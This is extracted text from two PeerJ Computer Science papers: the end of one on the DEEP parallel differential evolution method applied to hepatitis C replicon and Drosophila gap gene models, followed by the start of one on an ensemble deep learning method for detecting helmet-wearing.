model with 44 parameters of gap gene expression to the wild type and Kr mutant data simultaneously (Kozlov et al., 2012). Other DEEP applications include different problems described in Ivanisenko et al. (2014); Nuriddinov et al. (2013). Recently, DEEP was used in the online ancestry prediction tool reAdmix that can identify the biogeographic origins of highly mixed individuals (Kozlov et al., 2015a). reAdmix is available at http://chcb.saban-chla.usc.edu/reAdmix/. Two applications are discussed below in details. Subgenomic Hepatitis C virus replicon replication model The hepatitis C virus (HCV) causes hazardous liver diseases leading frequently to cirrhosis and hepatocellular carcinoma. No effective anti-HCV therapy is available up to date. Design of the effective anti-HCV medicine is a challenging task due to the ability of the hepatitis C virus to rapidly acquire drug resistance. The cells containing HCV subgenomic replicon are widely used for experimental studies of the HCV genome replication mechanisms and the in vitro testing of the tentative medicine. HCV NS3/4A protease is essential for viral replication and therefore it has been one of the most attractive targets for development of specific antiviral agents for HCV. We used the new algorithm and software package to determine 18 parameters (kinetic reaction constants) of the mathematical model of the subgenomic Hepatitis C virus Kozlov et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.74 13/20 https://peerj.com http://chcb.saban-chla.usc.edu/reAdmix/ http://dx.doi.org/10.7717/peerj-cs.74 Figure 2 Gene regulatory network, arrows and T-ended curves indicate activation and repressive inter- actions respectively, dotted lines show interactions present in wild type only (A). Regulatory weights of in- dividual transcription factor binding sites (B). Evolution of three objective functions during parameter fit- ting (C). See text for details. (HCV) replicon replication in Huh-7 cells in the presence of the HCV NS3 protease inhibitor, see Ivanisenko et al. (2013). The experimental data include kinetic curves of the viral RNA suppression at various inhibitor concentrations of the VX-950 and BILN-2061 inhibitors (Lin et al., 2004; Lin et al., 2006). We seek for the set of parameters that minimizes three criteria. The main criterion (RSS) is the residual sum of squared differences between the model output and data. Additional criteria 2 (F2) and 3 (F3) penalize the deviation of the time to steady state and the number of viral vesicles at the steady state, respectively. The combined criterion was defined as follows: Fcombined=RSS+0.1·F2+0.1·F3 (11) where the weights were obtained experimentally. The dependence of the best value of the combined criterion (11) in population of individuals on the generation number for 10 runs is plotted in Fig. 3A. The objective function is to be evaluated once for each member of the generation, the size of which was set to 200. The plot of the criteria in the close vicinity of the optimal values of the two parameters from the set is shown in Figs. 3B and 3C. Despite of the fact that the criteria do not take a minimal values in one and the same point, the algorithm produces reliable approximation of the optimum. The comparison of the model output and experimental dependencies of the viral RNA suppression rate on inhibitor concentration is shown in Figs. 3D and 3E. It is worth to note that, the model correctly reproduces experimental kinetics of the viral RNA suppression. The predictive power of the model was estimated using the experimental data on dependencies of the viral RNA suppression rate on the increasing concentration of the SCH-503034 (Malcolm et al., 2006) and ITMN-191 (Seiwert et al., 2008) inhibitors. These Kozlov et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.74 14/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.74 Figure 3 (A) The combined criterion (11) vs. the generation number for 10 runs. 200 function eval- uations were performed by the minimization procedure for each generation. (B, C) The criteria graphs are shown in the close vicinity of the optimal values of the four parameters. The values of the parameters found by the algorithm are denoted as x and y. (D, E) The viral RNA suppression in the presence of the NS3 protease inhibitors in different concentrations. The dependence of the viral RNA suppression on the increasing concentration of BILN-2061 (D) and VX-950 (E) inhibitors is shown for the third day post- treatment. A solid line is used to show model output and points correspond to the experimental data (Lin et al., 2004; Lin et al., 2006). (F, G) The predicted kinetics and the suppression rate of the viral RNA in comparison with data not used for parameter estimation. The dependencies of the suppression rate of the viral RNA on the increasing concentration of the SCH-503034 (F) and ITMN-2061 (G) inhibitors (Mal- colm et al., 2006; Seiwert et al., 2008). data were not used for parameter estimation. As it can be seen in Figs. 3F and 3G, the model correctly reproduces experimental observations and thus can be used for in silico studies. Sequence-based model of the gap gene regulatory network Recently, DEEP method was successfully applied to recover 68 parameters of the DNA sequence-based model (7)–(8) of regulatory network of 4 gap genes—hb, Kr, gt, and kni— and 8 transcription factors: Hb, Kr, Gt, Kni, Bcd, Tll, Cad and Hkb (Kozlov et al., 2015b). The trained model provides a tool to estimate the importance of each TF binding site for the model output (see Fig. 2B). We showed that functionally important sites are not exclusively located in cis-regulatory elements and that sites with low regulatory weight are important for the model output (Kozlov et al., 2014). The evolution of the three objective functions during one optimization run is shown in Fig. 2C. Note that the wPGP and the Penalty functions do not decline monotonically and simultaneously. In a few first steps these functions reach their maximal values while RSS falls sharply, that corresponds to the adaptation of the control parameters of the algorithm and substitution of old parameter sets with good ones. Then wPGP starts to decay, and Penalty fluctuates at high level, while RSS decays approximately at the same rate as wPGP. As Penalty depends only on regulatory parameters, its behaviour at this stage illustrates that it disallows the process to be trapped in some local minimum with extreme values of parameters. During the second half of the optimization process, Penalty Kozlov et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.74 15/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.74 reaches its final low level and stays at it almost constant till convergence while the RSS and wPGP exhibit a modest growth and then converge. This illustrates the ability of DEEP to balance several objective functions. The model output at this stage is not changed much as indicated by RSS though the absolute values of regulatory parameters are fine tuned. CONCLUSIONS The parallelization of objective function calculation implemented in DEEP method considerably reduces the computational time. Several members of the current generation are evaluated in parallel, which in our experience with Sequence-based Model of the Gap Gene Regulatory Network, resulted in 24 times speedup on 24 core computational node (Intel Xeon 5670, Joint Supercomputer Center of the Russian Academy of Sciences, Moscow). The calculation of 24 objective functions in parallel threads took approximately the same 20 s as one sequential job, and the optimization runs were able to converge in 14 h after approximately 60,000 functional evaluations. To sum up, we elaborated both the method and the software, which demonstrated high performance on test functions and biological problems of finding parameters in dynamic models of biological processes by minimizing one or even several objective functions that measure the deviation of model solution from data. ACKNOWLEDGEMENTS We are thankful to the Joint Supercomputer Center of the Russian Academy of Sciences, Moscow, for provided computational resources. ADDITIONAL INFORMATION AND DECLARATIONS Funding The implementation and testing was supported by RSF grant no. 14-14-00302, the method development was supported by RFBR grant 14-01-00334 and the Programme ‘‘5-100-2020’’ by the Russian Ministry of Science and Education. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: RSF: 14-14-00302. RFBR: 14-01-00334. Russian Ministry of Science and Education: 5-100-2020. Competing Interests The authors declare there are no competing interests. Author Contributions • Konstantin Kozlov conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. Kozlov et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.74 16/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.74 • Alexander M. Samsonov conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper. • Maria Samsonova conceived and designed the experiments, wrote the paper, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: SourceForge: http://deepmethod.sourceforge.net/ openSUSE: https://build.opensuse.org/project/repositories/home:mackoel:compbio. REFERENCES Akam M. 1987. The molecular basis for metameric pattern in the Drosophila embryo. Development 101:1–22. Chen L, Liu H-L, Zheng Z, Xie S. 2014. A evolutionary algorithm based on covariance matrix learning and searching preference for solving CEC 2014 benchmark prob- lems. In: CEC 2014 special session and competition on single objective real-parameter numerical optimization, vol. 3. Piscataway: IEEE, 2672–2677. Chu KW, Deng Y, Reinitz J. 1999. Parallel simulated annealing by mixing of states. The Journal of Computational Physics 148:646–662 DOI 10.1006/jcph.1998.6134. Cicin-Sain D, Pulido AH, Crombach A, Wotton KR, Jiménez-Guri E, Taly J-F, Roma G, Jaeger J. 2015. SuperFly: a comparative database for quantified spatio- temporal gene expression patterns in early dipteran embryos. Nucleic Acids Research 43(D1):D751–D755 DOI 10.1093/nar/gku1142. Egea JA, Henriques D, Cokelaer T, Villaverde AF, MacNamara A, Danciu D-P, Banga JR, Saez-Rodriguez J. 2014. MEIGO: an open-source software suite based on metaheuristics for global optimization in systems biology and bioinformatics. BMC Bioinformatics 15(1):1–9 DOI 10.1186/1471-2105-15-1. Egea JA, Martí R, Banga JR. 2010. An evolutionary method for complex-process optimization. Computers & Operations Research 37(2):315–324 DOI 10.1016/j.cor.2009.05.003. Elsayed SM, Sarker RA, Essam DL, Hamza NM. 2014. Testing united multi-operator evolutionary algorithms on the CEC-2014 real-parameter numerical optimization. In: CEC 2014 special session and competition on single objective real-parameter numerical optimization, vol. 3. Piscataway: IEEE, 1650–1657. Fan H-Y, Lampinen J. 2003. A trigonometric mutation operation to differential evolu- tion. Journal of Global Optimization 27:105–129 DOI 10.1023/A:1024653025686. Fomekong-Nanfack Y. 2009. Genetic Regulatory Networks Inference: modeling, parameters estimation and model validation. PhD Thesis, University of Amsterdam. Fomekong-Nanfack Y, Kaandorp J, Blom J. 2007. Efficient parameter estimation for spatio-temporal models of pattern formation: case study of Drosophila melanogaster. Bioinformatics 23(24):3356–3363 DOI 10.1093/bioinformatics/btm433. Kozlov et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.74 17/20 https://peerj.com http://deepmethod.sourceforge.net/ https://build.opensuse.org/project/repositories/home:mackoel:compbio http://dx.doi.org/10.1006/jcph.1998.6134 http://dx.doi.org/10.1093/nar/gku1142 http://dx.doi.org/10.1186/1471-2105-15-1 http://dx.doi.org/10.1016/j.cor.2009.05.003 http://dx.doi.org/10.1023/A:1024653025686 http://dx.doi.org/10.1093/bioinformatics/btm433 http://dx.doi.org/10.7717/peerj-cs.74 Gaemperle R, Mueller SD, Koumoutsakos P. 2002. A parameter study for differential evolution. In: Grmela A, Mastorakis NE, eds. Advances in intelligent systems, fuzzy systems, evolutionary computation. WSEAS Press, 293–298. He X, Samee MAH, Blatti C, Sinha S. 2010. Thermodynamics-based models of tran- scriptional regulation by enhancers: the roles of synergistic activation, cooperative binding and short-range repression. PLoS Computational Biology 6(9):e1000935 DOI 10.1371/journal.pcbi.1000935. Ivanisenko N, Mishchenko E, Akberdin I, Demenkov P, Likhoshvai V, Kozlov K, Todorov D, Samsonova M, Samsonov A, Kolchanov N, Ivanisenko V. 2013. Replication of the Subgenomic Hepatitis C virus replicon in the presence of the NS3 protease inhibitors: a stochastic model. Biophysics 58(5):592–606 DOI 10.1134/S0006350913050059. Ivanisenko NV, Mishchenko EL, Akberdin IR, Demenkov PS, Likhoshvai VA, Kozlov KN, Todorov DI, Gursky VV, Samsonova MG, Samsonov AM, Clausznitzer D, Kaderali L, Kolchanov NA, Ivanisenko VA. 2014. A new stochastic model for Subgenomic Hepatitis C virus replication considers drug resistant mutants. PLoS ONE 9(3):e91502 DOI 10.1371/journal.pone.0091502. Jaeger J. 2011. The gap gene network. Cellular and Molecular Life Sciences 68:243–274 DOI 10.1007/s00018-010-0536-y. Jaeger J, Surkova S, Blagov M, Janssens H, Kosman D, Kozlov KN, Manu, Myasnikova E, Vanario-Alonso CE, Samsonova M, Sharp DH, Reinitz J. 2004. Dynamic control of positional information in the early Drosophila embryo. Nature 430:368–371 DOI 10.1038/nature02678. Kozlov K, Chebotarev D, Hassan M, Triska M, Triska P, Flegontov P, Tatarinova T. 2015a. Differential evolution approach to detect recent admixture. BMC Genomics 16(Suppl 8):Article S9 DOI 10.1101/015446. Kozlov K, Gursky VV, Kulakovskiy IV, Dymova A, Samsonova M. 2015b. Analysis of functional importance of binding sites in the drosophila gap gene network model. BMC Genomics 16(13):1–16 DOI 10.1186/1471-2164-16-S13-S7. Kozlov K, Gursky V, Kulakovskiy I, Samsonova M. 2014. Sequence-based model of gap gene regulatory network. BMC Genomics 15(Suppl 12):Article S6. Kozlov K, Ivanisenko N, Ivanisenko V, Kolchanov N, Samsonova M, Samsonov AM. 2013. Enhanced differential evolution entirely parallel method for biomedical applications. In: Malyshkin V, ed. Lecture notes in computer science, vol. 7979. New York: Springer, 409–416. Kozlov K, Samsonov A. 2011. DEEP—differential evolution entirely parallel method for gene regulatory networks. Journal of Supercomputing 57:172–178 DOI 10.1007/s11227-010-0390-6. Kozlov K, Surkova S, Myasnikova E, Reinitz J, Samsonova M. 2012. Modeling of gap gene expression in Drosophila Kruppel mutants. PLoS Computational Biology 8(8):e1002635 DOI 10.1371/journal.pcbi.1002635. Liang JJ, Qu BY, Suganthan PN. 2014. Problem definitions and evaluation criteria for the CEC 2014 special session and competition on single objective real-parameter Kozlov et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.74 18/20 https://peerj.com http://dx.doi.org/10.1371/journal.pcbi.1000935 http://dx.doi.org/10.1134/S0006350913050059 http://dx.doi.org/10.1371/journal.pone.0091502 http://dx.doi.org/10.1007/s00018-010-0536-y http://dx.doi.org/10.1038/nature02678 http://dx.doi.org/10.1101/015446 http://dx.doi.org/10.1186/1471-2164-16-S13-S7 http://dx.doi.org/10.1007/s11227-010-0390-6 http://dx.doi.org/10.1371/journal.pcbi.1002635 http://dx.doi.org/10.7717/peerj-cs.74 numerical optimization. Technical Report 201311. Singapore: Computational Intelligence Laboratory, Zhengzhou University, Zhengzhou China And Technical Report, Nanyang Technological University. Lin C, Lin K, Luong YP, Rao BG, Wei YY, Brennan DL, Fulghum JR, Hsiao HM, Ma S, Maxwell JP, Cottrell KM, Perni RB, Gates CA, Kwong AD. 2004. In vitro resistance studies of hepatitis C virus serine protease inhibitors, VX-950 and BILN 2061: structural analysis indicates different resistance mechanisms. Journal of Biological Chemistry 279(17):17508–17514 DOI 10.1074/jbc.M313020200. Lin K, Perni RB, Kwong AD, Lin C. 2006. VX-950, a novel hepatitis C virus (HCV) NS3- 4A protease inhibitor, exhibits potent antiviral activities in HCv replicon cells. An- timicrobial Agents and Chemotherapy 50(5):1813–1822 DOI 10.1128/AAC.50.5.1813-1822.2006. Malcolm BA, Liu R, Lahser F, Agrawal S, Belanger B, Butkiewicz N, Chase R, Gheyas F, Hart A, Hesk D, Ingravallo P, Jiang C, Kong R, Lu J, Pichardo J, Prongay A, Skelton A, Tong X, Venkatraman S, Xia E, Girijavallabhan V, Njoroge FG. 2006. SCH 503034, a mechanism-based inhibitor of hepatitis C virus NS3 protease, suppresses polyprotein maturation and enhances the antiviral activity of alpha in- terferon in replicon cells. Antimicrobial Agents and Chemotherapy 50(3):1013–1020 DOI 10.1128/AAC.50.3.1013-1020.2006. Mendes P, Kell DB. 1998. Non-linear optimization of biochemical pathways: applica- tions to metabolic engineering and parameter estimation. Bioinformatics 14:869–883 DOI 10.1093/bioinformatics/14.10.869. Moles CG, Mendes P, Banga JR. 2003. Parameter estimation in biochemical pathways: comparison of global optimization methods. Genome Research 13:2467–2474 DOI 10.1101/gr.1262503. Nuriddinov M, Kazantsev F, Rozanov A, Kozlov K, Peltek S, Akberdin I, Kolchanov N. 2013. Mathematical modeling of ethanol and lactic acid biosynthesis by theromphilic geobacillus bacteria. Russian Journal of Genetics: Applied Research 17(4/1):686–704. Pisarev A, Poustelnikova E, Samsonova M, Reinitz J. 2008. FlyEx, the quantitative atlas on segmentation gene expression at cellular resolution. Nucleic Acids Research 37:D560–D566 DOI 10.1093/nar/gkn717. Reinitz J, Sharp DH. 1995. Mechanism of eve stripe formation. Mechanisms of Develop- ment 49:133–158 DOI 10.1016/0925-4773(94)00310-J. Samee MAH, Sinha S. 2013. Evaluating thermodynamic models of enhancer activity on cellular resolution gene expression data. Methods 62:79–90 DOI 10.1016/j.ymeth.2013.03.005. Seiwert SD, Andrews SW, Jiang Y, Serebryany V, Tan H, Kossen K, Rajagopalan RPT, Misialek S, Stevens SK, Stoycheva A, Hong J, Lim SR, Qin X, Rieger R, Condroski KR, Zhang H, Do MG, Lemieux C, Hingorani GP, Hartley DP, Josey JA, Pan L, Beigelman L, Blatt LM. 2008. Preclinical characteristics of the HCV NS3/4A protease inhibitor ITMN-191 (R7227). Antimicrobial Agents and Chemotherapy 52(12):4432–4441 DOI 10.1128/AAC.00699-08. Kozlov et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.74 19/20 https://peerj.com http://dx.doi.org/10.1074/jbc.M313020200 http://dx.doi.org/10.1128/AAC.50.5.1813-1822.2006 http://dx.doi.org/10.1128/AAC.50.3.1013-1020.2006 http://dx.doi.org/10.1093/bioinformatics/14.10.869 http://dx.doi.org/10.1101/gr.1262503 http://dx.doi.org/10.1093/nar/gkn717 http://dx.doi.org/10.1016/0925-4773(94)00310-J http://dx.doi.org/10.1016/j.ymeth.2013.03.005 http://dx.doi.org/10.1128/AAC.00699-08 http://dx.doi.org/10.7717/peerj-cs.74 Spirov AV, Kazansky AB. 2002. Jumping genes-mutators can raise efficacy of evolu- tionary search. In: Proceedings of the genetic and evolutionary computation conference GECCO2002. San Francisco: Morgan Kaufmann Publishers Inc. Storn R, Price K. 1995. Differential evolution—a simple and efficient heuristic for global optimization over continuous spaces. Technical Report TR-95-012. Berkeley: ICSI. Suleimenov Y. 2013. Global parameter estimation for thermodynamic models of transcriptional regulation. Methods 62:99–108 DOI 10.1016/j.ymeth.2013.05.012. Surkova S, Kosman D, Kozlov K, Manu, Myasnikova E, Samsonova A, Spirov A, Vanario-Alonso CE, Samsonova M, Reinitz J. 2008. Characterization of the Drosophila segment determination morphome. Developmental Biology 313(2):844–862 DOI 10.1016/j.ydbio.2007.10.037. Tanabe R, Fukunaga AS. 2014. Improving the search performance of shade by using linear population size reduction. In: CEC 2014 special session and competition on single objective real-parameter numerical optimization, vol. 3. Piscataway: IEEE, 1658–1665. Tasoulis D, Pavlidis N, Plagianakos V, Vrahatis M. 2004. Parallel differential evolution. In: Congress on evolutionary computation (CEC 2004), vol. 2. Piscataway: IEEE, 2023–2029. Zaharie D. 2002. Parameter adaptation in differential evolution by controlling the population diversity. In: Petcu D, ed. Proceedigs of the 4th international workshop on symbolic and numeric algorithms for scientific computing. Timisoara, Romania, 385–397. Kozlov et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.74 20/20 https://peerj.com http://dx.doi.org/10.1016/j.ymeth.2013.05.012 http://dx.doi.org/10.1016/j.ydbio.2007.10.037 http://dx.doi.org/10.7717/peerj-cs.74 work_35n7f6rilnfzdevpa7noi3pla4 ---- Submitted 6 August 2020 Accepted 8 October 2020 Published 7 December 2020 Corresponding author Chengbin Peng, pengcheng- bin@nbu.edu.cn Academic editor Faizal Khan Additional Information and Declarations can be found on page 18 DOI 10.7717/peerj-cs.311 Copyright 2020 Fan et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS A deep learning-based ensemble method for helmet-wearing detection Zheming Fan1, Chengbin Peng1,2, Licun Dai1, Feng Cao1, Jianyu Qi1 and Wenyi Hua1 1 College of Information Science and Engineering, Ningbo University, Ningbo, China 2 Ningbo Institute of Industrial Technology, Chinese Academy of Sciences, Ningbo, China ABSTRACT Recently, object detection methods have developed rapidly and have been widely used in many areas. In many scenarios, helmet wearing detection is very useful, because people are required to wear helmets to protect their safety when they work in construction sites or cycle in the streets. However, for the problem of helmet wearing detection in complex scenes such as construction sites and workshops, the detection accuracy of current approaches still needs to be improved. In this work, we analyze the mechanism and performance of several detection algorithms and identify two feasible base algorithms that have complementary advantages. We use one base algorithm to detect relatively large heads and helmets. Also, we use the other base algorithm to detect relatively small heads, and we add another convolutional neural network to detect whether there is a helmet above each head. Then, we integrate these two base algorithms with an ensemble method. In this method, we first propose an approach to merge information of heads and helmets from the base algorithms, and then propose a linear function to estimate the confidence score of the identified heads and helmets. Experiments on a benchmark data set show that, our approach increases the precision and recall for base algorithms, and the mean Average Precision of our approach is 0.93, which is better than many other approaches. With GPU acceleration, our approach can achieve real-time processing on contemporary computers, which is useful in practice. Subjects Computer Vision, Data Mining and Machine Learning, Social Computing Keywords Ensemble method, Deep learning, Helmet-wearing detection, Face detection INTRODUCTION Helmets can play a vital role in protecting people. For example, many severe accidents in production and work sites and roads have been related to violations of wearing helmets. Some personnel may lack safety awareness in a working site and often do not or forget to wear helmets. On the road, craniocerebral injury is the leading cause of serious injury to cyclists in road traffic (World Health Organization, 2006). However, wearing a helmet reduces the risk of head injury of motorcycle riders by 69% (Liu et al., 2008), and wearing a helmet reduces the risk of head injury for cyclists by 63%–88% (Thompson, Rivara & Thompson, 1999). Monitoring helmet-wearing manually can have many limitations, as people can be fatigue and costly. Reducing manual monitoring while ensuring that relevant personnel wearing helmets all the time in the working area has become an urgent problem. How to cite this article Fan Z, Peng C, Dai L, Cao F, Qi J, Hua W. 2020. A deep learning-based ensemble method for helmet-wearing de- tection. PeerJ Comput. Sci. 6:e311 http://doi.org/10.7717/peerj-cs.311 https://peerj.com/computer-science mailto:pengchengbin@nbu.edu.cn mailto:pengchengbin@nbu.edu.cn https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.311 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.311 Image recognition technology can reduce the workforce and material expenditures, and can significantly protect workers in many areas. Developments of computer vision algorithms and hardware (Feng et al., 2019) have paved the road for the application in helmet detection. Deep neural networks have gained much attention in image classification (Krizhevsky, Sutskever & Hinton, 2017), object recognition (Donahue et al., 2013), and image segmentation (Garcia-Garcia et al., 2017). Previous computer vision algorithms for helmet detection are usually used in relatively simple scenes. For helmet detection, Rubaiyat et al, (2016) used a histogram of oriented gradient and a support vector machine to locate persons, then used a hough transform to detect helmet for the construction worker. Li et al. (2017b) identified helmets by background subtraction. Li et al. (2017a) used ViBe background modeling algorithm and human body classification framework C4 to select people and heads, and then identified whether people wore helmets through color space transformation and color feature recognition. However, such approaches are typically not suitable for complex scenes and dynamic backgrounds, such as construction sites, workshops, and streets. Choudhury, Aggarwal & Tomar (2020) and Long, Cui & Zheng (2019) use single shot object detector algorithm to detect helmets. Siebert & Lin (2020) used RetinaNet which uses a multi-scale feature pyramid and focal loss to address the general limitation of one-stage detectors in accuracy, it works well in certain situations but its performance is highly scene dependent and influenced by light. Bo et al. (2019) use the You Only Look Once (YOLO) algorithm to accurately detect helmet wear in images with an average of four targets. However, most of these approaches are not suitable for both small and large helmets at the same time. In this work, we propose a framework to integrate two complementary deep learning algorithms to improve the ability of helmet-wearing detection in complex scenes. Our approach is able to identify regular-size and tiny-size objects at the same time for helmet- wearing detection, and can be used for detection in complex scenes. This framework can outperform traditional approaches on benchmark data. RELATED WORK The starting point of CNN is the neurocognitive machine model (Fukushima & Miyake, 1982). At this time, the convolution structure has appeared. The classic LeNet (LeCun et al., 1998) was proposed in 1998. However, CNN’s edge began to be overshadowed by models such as SVM (support vector machine) later. With the introduction of ReLU (Rectified Linear Units), dropout, and historic opportunities brought by GPU and big data, CNN ushered in a breakthrough in 2012: AlexNet (Krizhevsky, Sutskever & Hinton, 2017). In the following years, CNN showed explosive development, and various CNN models emerged. CNN has gradually gained the favor of scholars due to its advantages of not having to manually design features when extracting image features (Shi, Chen & Yang, 2019). Fan et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.311 2/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.311 Many recent object detection approaches are based on RCNN (Region-based Convolutional Neural Networks) algorithms and YOLO algorithms (Redmon et al., 2016). RCNN is an improved algorithm based on CNN. Girshick et al. propose an epoch-making RCNN algorithm (Girshick et al., 2014) in the field of object detection. The central idea is to use a search selective method to extract some borders from the image. Then the size of the area divided by the border is normalized to the convolutional neural network input size, and then the SVM is used to identify the target. The bounding box of the target is obtained through a linear regression model. It brought deep learning and CNN to people’s sight. However, there are disadvantages such as cumbersome training steps, slow test training speed, and large space occupation. In order to improve the training and testing speed of RCNN, Fast RCNN algorithm (Girshick, 2015) was developed. It uses fewer layers while adding an ROI pooling layer to adjust the convolution area, and using softmax instead of the original SVM for classification. Compared with RCNN, Fast RCNN has improved training and testing speed. However, because the selective search method is also used to extract the borders of the region of interest, the speed of this algorithm is still not ideal for working with large data sets. Later, Faster RCNN (Ren et al., 2015) integrates feature extraction, proposal extraction, bounding box regression, classification, etc. into a network. The overall performance is far superior to CNN, and at the same time, it runs nearly much faster than CNN. Thus, Faster RCNN is commonly used in many applications. The Faster RCNN performs well for relatively large objects, but when detecting small faces or helmets, there will be a large false negative rate. Tiny Face has made certain optimizations for small face detection. It mainly optimizes face detection from three aspects: the role of scale invariance, image resolution, and contextual reasoning. Scale invariance is a fundamental property of almost all current recognition and object detection systems, but from a practical point of view, the same scale is not applicable to a sensor with a limited resolution: the difference in incentives between a 300px face and a 3px face is undeniable (Hu & Ramanan, 2017). Ramanan et al. conducted an in-depth analysis of the role of scale invariance, image resolution, and contextual reasoning. Compared with mainstream technology at the time, the error rate can be significantly reduced (Hu & Ramanan, 2017). Boosting algorithm was initially proposed as a polynomial-time algorithm, and the effectiveness has been experimentally and theoretically proved (Schapire, 1990). Afterward, Freund et al. improved the Boosting algorithm to obtain the Adaboost algorithm (Freund & Schapire, 1997). The principle of the algorithm is to filter out the weights from the trained weak classifiers by adjusting the sample weights and weak classifier weights. The weak classifiers with the smallest coefficients are combined into a final robust classifier. Fan et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.311 3/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.311 In this work, in order to identify a variety of heads and helmets in complex scenes, we propose a framework to use incorporate multiple complementary deep learning algorithms to improve the joint performance. MATERIALS & METHODS Method To address the helmet-wearing detection problem, we compare several object detection methods, such as the naive Bayes classifier, SVM, and Artificial Neural Networks classifier. Naive Bayes usually needs independent distributive premises. SVM is difficult to training for various scenes. In the case of a complex scene and huge training data, artificial neural networks are expected to have better accuracy and reliability, so we propose to use artificial neural networks, especially, convolutional neural networks, to solve this issue. To address the disadvantages raised by long-range cameras, we further improve the performance by integrating multiple complementary deep neural network models. Base algorithms Faster RCNN for detecting faces and helmet-wearing. After images are fed, Faster RCNN firstly extracts image feature maps through a group of basic conv+relu+pooling layer. Next, RPN (Region Proposal Networks) will set a large number of anchors on the scale of the original image, and randomly select 128 positive anchors and 128 negative anchors from all anchors for binary training, and use these anchors and a softmax function to initially extract positive anchors as the candidate area. At this time, the candidate regions are not accurate and require bounding boxes. For a given image I, we use A to represent the ground-truth anchors. We use AF and cF to represent the identified bounding boxes and helmet-wearing confidence scores, respectively, computed by the Faster-RCNN algorithm. If we use F to represent the algorithm, WF to represent the weight of the network, this approach can be written as follows. AF,cF =F(I,WF) (1) If we consider AF =F(I,WF)[0] and cF =F(I,WF)[1], we can use Loss(F(I,WF)[0],F(I,WF)[1],A) (2) to represent the loss function (Fukushima & Miyake, 1982) when to minimize differences between the detected anchors and the ground-truth. Thus, when we train this model, the optimization is as follows. W∗F =argminWFLoss(F(I,WF)[0],F(I,WF)[1],A) (3) Tiny Face for detecting faces. The overall idea of Tiny Face is similar to RPN in Faster RCNN, which is a one-stage detection method. The difference is that some scale specific design and multi-scale feature fusion are added, supplemented by image pyramid so that Fan et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.311 4/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.311 the final detection effect for small faces is better. The training data were changed by three scales, with one-third of the probability respectively and sent to the network for training. Multiple scales could be selected to improve the accuracy rate in the prediction. For a given image I, we can also use AT and cT to represent the identified bounding boxes and confidence scores computed by the Tiny Face algorithm, so if we use T to represent the Tiny Face algorithm and WT to represent the corresponding weight, we can have AT,cT =T(I,WT ) (4) However, Tiny Face can only be used to determine whether the detection target contains a human face and cannot directly distinguish whether the target is wearing a helmet. Thus, we propose to use CNN to overcome this disadvantage. CNN for detecting helmet-wearing. For anchors determined by Tiny Face, we can use a CNN to detect helmets above the face. We enlarge the face area detected by the Tiny Face and feed it into the CNN model for prediction. The confidence scores indicating whether there is a helmet above the face can be computed by the CNN algorithm cC =C(AT,I,WC), (5) where C is a function representing the forward propagation of CNN. Here, C is a composition of two convolution layers and one fully connected layer. The loss function is again to minimize the difference between detected helmets and the ground-truth Loss(AT,C(AT,I,WC),A). (6) Ensemble model detecting high and low resolution helmets For the two lists of face anchors AF and AT detected by the base algorithms above, we merge them with the following strategy. We first initialize an empty anchor list AS and two score vector cSF and cSC. For the ith anchor in AF and the corresponding score in cF, namely, AF[i] and cF[i], we first insert them into AS and cSF respectively. Then AF[i] is compared with all the anchors in AT . If some anchors in AT have more than 60% overlapping area with AF[i], we remove these anchors in AT and remove the corresponding entries in cC. We also take the mean value of the removed entries in cC and insert it into cSC. If no overlapped anchors in AT is found, we insert zero into cSC. After all the anchors in AF in processed, the remaining anchors in AT , the remaining confidence values in cC, and a zero vector of the same length is inserted into AS, cSC, and cSF, respectively. At last, we compute the covering area of each anchor in AS and store them in δ. Fan et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.311 5/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.311 The pseudocode of the merge process can be described as follows. After the data preparation, many ensemble learning methods can be used for model integration. In this work, we consider a basic ensemble model defined as follows S(cSF,cSC,δ,α)= ∑ i αihi(cSF,cSC,δ) (7) where α is the model parameter, δ is a vector containing the area of corresponding anchors, and hi() is a classifier. We choose decision trees with maximum depth of two in the experiment, and i is ranged from 0 to 1000. The variable δ is used here because the two base algorithms are good at identifying relatively large and small objects respectively, and adding covering areas of anchors can help improve the accuracy. Thus, in the ensemble method, AS is the anchor lists, and cS=S(cSF,cSC,δ,α) contains the corresponding confidence values about helmet-wearing. To train this model, we merge the anchor set AS and the ground-truth set A in a similar manner as merging AF and AT , and we use ĉSF, ĉSC and ĉ to represent the corresponding variables after merging. Zeros are filled if the corresponding anchor does not exist before merging. Then, the loss between the identified anchors in AS and the ground-truth anchors A is E(δ,α,ĉSF,ĉSC,ĉ)= n∑ i=0 (S(ĉSF[i],ĉSC[i],δ,α)− ĉ[i]) 2 (8) where n is the total anchors after merging. The optimal value of α can be computed by minimizing the error α ∗ =argminαE(α,ĉSF,ĉSC,ĉ) (9) Fan et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.311 6/21 